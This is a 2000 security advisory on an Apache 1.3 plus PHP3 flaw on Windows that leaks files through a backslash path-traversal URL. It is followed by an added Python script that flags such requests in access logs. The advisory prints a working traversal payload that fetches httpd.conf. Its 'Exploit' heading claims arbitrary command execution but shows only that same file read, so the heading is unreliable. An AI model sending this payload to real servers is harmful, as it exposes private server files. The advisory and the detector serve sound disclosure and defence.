Title: PHP and Apache Vulnerability
Released by: CHINANSL
Date: 6th December 2000
CHINANSL Security Advisory(CSA-200011)
Topic: PHP AND APACHE Vulnerability
Release Date: Dec 6, 2000
Affected system:
============
APACHE WEB SERVER 1.3
    - Microsoft Windows NT 4.0
    - Microsoft Windows 2000
Impact:
======
The CHINANSL security team has found a security
problem in the Apache web server when it is used
with PHP3. By exploiting this vulnerability, a
malicious user can access the contents of files on
the machine where the Apache web server is running.
Description:
=========
For example (Windows 2000 + Apache 1.3.6 + PHP3):
http://taget/index.php3.%5c../..%5cconf/httpd.conf
You will get the httpd.conf file.
Exploit:
=====
Run arbitrary command:
http://taget/index.php3.%5c../..%5cconf/httpd.conf
You will get the httpd.conf file.
Solution:
=======
None
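Since the advisory lists no fix, the access log is where this request pattern can be spotted. The following is an added example, not part of the CHINANSL advisory: it flags request paths that, once percent-decoded, contain a backslash together with a ".." segment, as in the URL shown above. The log lines are constructed and the function names are this example's own.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Common Log Format); addresses and times are made up.
SAMPLE_LOG = """\
192.0.2.10 - - [06/Dec/2000:10:01:02 +0800] "GET /index.php3 HTTP/1.0" 200 1532
192.0.2.44 - - [06/Dec/2000:10:03:17 +0800] "GET /index.php3.%5c../..%5cconf/httpd.conf HTTP/1.0" 200 30112
192.0.2.44 - - [06/Dec/2000:10:03:40 +0800] "GET /docs/a..b/readme.txt HTTP/1.0" 200 210
192.0.2.51 - - [06/Dec/2000:10:05:09 +0800] "GET /index.php3.%255C../..%255Cconf/httpd.conf HTTP/1.0" 404 289
"""

# Pulls the request path out of the quoted request line.
REQUEST_RE = re.compile(r'"(?:[A-Z]+) (\S+) HTTP/[\d.]+"')


def decode_fully(path, max_rounds=3):
    """Percent-decode repeatedly so a double-encoded %255c is also unmasked."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def is_backslash_traversal(raw_path):
    """True if the decoded path has a backslash and a '..' path segment."""
    path = decode_fully(raw_path.split("?", 1)[0])  # ignore the query string
    if "\\" not in path:
        return False
    # Treat both separators alike, the way a Windows file system does.
    return ".." in re.split(r"[\\/]", path)


def scan(log_text):
    """Return the raw request paths that match the advisory's pattern."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if m and is_backslash_traversal(m.group(1)):
            hits.append(m.group(1))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("suspicious:", hit)
```

A hit paired with a 200 status and a response size far larger than the script's normal output deserves the first look.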
DISCLAIMS:
========
THE INFORMATION PROVIDED IS RELEASED BY
CHINANSL "AS IS" WITHOUT WARRANTY OF ANY
KIND. CHINANSL DISCLAIMS ALL WARRANTIES,
EITHER EXPRESS OR IMPLIED, EXCEPT FOR
THE WARRANTIES OF MERCHANTABILITY. IN NO
EVENT SHALL CHINANSL BE LIABLE FOR ANY
DAMAGES WHATSOEVER INCLUDING DIRECT,
INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS
OF BUSINESS PROFITS OR SPECIAL DAMAGES,
EVEN IF CHINANSL HAS BEEN ADVISED OF THE
POSSIBILITY OF SUCH DAMAGES. DISTRIBUTION
OR REPRODUCTION OF THE INFORMATION IS
PROVIDED THAT THE ADVISORY IS NOT
MODIFIED IN ANY WAY.
Copyright 1999-2000 CHINANSL. All Rights Reserved.
CHINANSL Security Team (http://www.chinansl.com)